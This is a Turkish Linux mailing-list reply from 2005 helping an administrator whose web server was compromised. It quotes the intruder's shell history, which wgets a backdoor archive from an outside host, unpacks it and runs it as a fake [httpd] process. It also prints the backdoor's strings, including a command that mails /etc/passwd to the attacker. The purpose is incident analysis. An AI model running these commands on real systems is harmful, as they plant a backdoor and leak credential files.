From: S.Çaðlar Onur (caglar@uludag.org.tr)
Date: Mon 18 Apr 2005 - 17:37:00 EEST
Selamlar;
Bence hemen makinanın ethernet kablosunu çekip, dosyalarınızı
yedeklemeye başlayın. Birileri sisteminizde nağralar atıyor şu an.
$ wget wget powerlock.home.ro/newpass.tgz
ile bahsi geçen dosyayı alırsanız ve içinden çıkan newpass binary'sine
$ strings newpass
komutu ile bakarsanız,
...
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
care e parola
socket
bind
listen
make by alin777 email alin777@alin777.net
cat /etc/passwd | mail alin777@alin777.net
/dev/null
HOME=%s
Can't fork pty, bye!
Make by alin777.Mail alin777@alin777.net
Enter a password:
parola ff corecta
parola ff proasta
puzzleme
/bin/sh
benzeri bir sürü satır göreceksiniz. socket, bind ve listen'dan bunun
bir daemon olduğu ve arada şifreleri, etc/password gibi dosyaları
alin777@alin777.net gibi bir adrese attığını görebilirsiniz sanırım.
Zaten .bash_history'e göre hali hazırda "[http]" isminde bir process
sisteminizde huzur içinde çalışıyor.
Gerekli dosyaları yedekleyip, temiz olduklarından emin olup sistemi
yeniden kurmaktan başka bir yol sizin için göremiyorum.
Pzt, 2005-04-18 tarihinde 13:48 +0300 saatinde, The RED yazdı:
> /var/tmp dizininde .bash_history oluÅŸmuÅŸ. Sunucudaki exploit bir shell
> hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
> hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
> /var/tmp/.bash_history dosyasının içeriği:
>
> e
> w
> /sbin/ifconfig
> w
> cd /var/tmp/.hu
> cd /var/tmp
> mkdir .hu
> cd .hu
> wget powerlock.home.ro/newpas.tgz
> wget powerlock.home.ro/newpass.tgz
> tar zxvf newpass.tgz
> mv newpass [httpd]
> export PATH="."
> [httpd]
Saygılar
-- S.Çağlar Onur <caglar@uludag.org.tr> http://cekirdek.uludag.org.tr/~caglar/Linux is like living in a teepee. No Windows, no Gates and an Apache in house!
_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu